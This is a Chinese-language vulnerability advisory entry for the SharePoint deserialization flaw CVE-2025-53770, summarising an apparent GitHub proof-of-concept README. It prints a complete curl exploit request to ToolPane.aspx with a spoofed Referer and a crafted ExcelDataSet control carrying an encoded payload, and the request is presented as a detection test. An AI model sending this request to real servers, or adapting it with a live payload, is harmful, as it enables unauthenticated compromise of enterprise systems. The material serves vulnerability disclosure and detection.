Microsoft SharePoint Server 反序列化远程代码执行漏洞

漏洞信息

漏洞名称： Microsoft SharePoint Server 反序列化远程代码执行漏洞

漏洞编号：

• CVE： CVE-2025-53770

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Microsoft SharePoint Server是一款广泛使用的企业级协作平台，支持文档管理、内容管理、业务流程自动化等功能，常见于大型企业和组织中，用于内部和外部协作。该平台因其强大的功能和集成能力而受到许多组织的青睐。此次发现的漏洞涉及SharePoint Server在处理序列化数据时的安全问题，具体表现为不安全的反序列化操作。攻击者可以通过构造恶意的序列化数据，利用SharePoint Server的特定端点（如ToolPane.aspx）进行攻击，无需身份验证即可实现远程代码执行。这种漏洞的根源在于SharePoint Server未能正确验证和清理用户提供的序列化数据，导致攻击者可以注入恶意代码并在服务器上执行。由于该漏洞允许未经验证的远程攻击者完全控制系统，其潜在影响极为严重，可能导致数据泄露、服务中断，甚至整个企业网络的安全受到威胁。微软已意识到该漏洞的活跃利用，并正在准备全面的更新。在此期间，建议用户遵循微软提供的缓解措施，以减少被攻击的风险。

产品厂商： Microsoft

产品名称： SharePoint Server

来源： https://github.com/MuhammadWaseem29/CVE-2025-53770

类型： CVE-2025:github search

仓库文件

• README.md

来源概述

CVE-2025-53770 SharePoint Deserialization RCE PoC

Critical — Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)

Description

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an attacker to execute code remotely and compromise the system. Microsoft is aware of active exploitation and is preparing a comprehensive update. Ensure mitigations from CVE documentation are in place.

• Impact: Unauthenticated attackers can achieve remote code execution, leading to full system compromise.
• Severity: Critical

Proof of Concept

The following PoC demonstrates how an attacker can exploit the vulnerability to extract and decode malicious payloads via the vulnerable endpoint.

Target domain is intentionally replaced with reeaccated.com.

Command

curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Output

<Info>IntruderScannerDetectionPayload</Info>

References

• Test Payload Implementation
• Code White Security Analysis
• Microsoft Guidance
• NVD Entry

---

Impact:
Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.